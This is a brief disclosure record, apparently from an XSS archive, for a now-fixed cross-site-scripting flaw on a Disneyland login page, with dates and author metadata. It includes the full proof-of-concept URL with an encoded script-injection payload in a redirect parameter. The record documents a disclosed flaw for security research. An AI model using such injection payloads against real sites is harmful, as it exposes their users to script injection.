Security researcher Viper.aT, has submitted on 09/01/2009 a cross-site-scripting (XSS) vulnerability affecting secure-disneyland.disney.go.com, which at the time of submission ranked 269 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 01/02/2009. It is currently fixed. |
Date submitted: 09/01/2009 |
Date published: 01/02/2009 |
Date fixed: 15/10/2010 | Status: FIXED |
Author: Viper.aT |
Domain: secure-disneyland.disney.go.com |
Category: XSS |
Pagerank: 269 |
URL: https://secure-disneyland.disney.go.com/disneyland/en_US/myVacation/myProfile/login?name=LoginPage&a ppRedirect=http://disneyland.disney.go.com/disneyland/en_US/reserve/packages/detail%3Fname=GoodNeigh borHotelPackage2009Page%26year=2009%27%22%3E%3Cscript%3Ealert(%22XSS%20by%20Viper.aT%22);%3C/script% 3E/%3E%3Ch1%3EXSSED%3C/h1%3E&templateID=364 |
Click here to view the mirror
|
|
|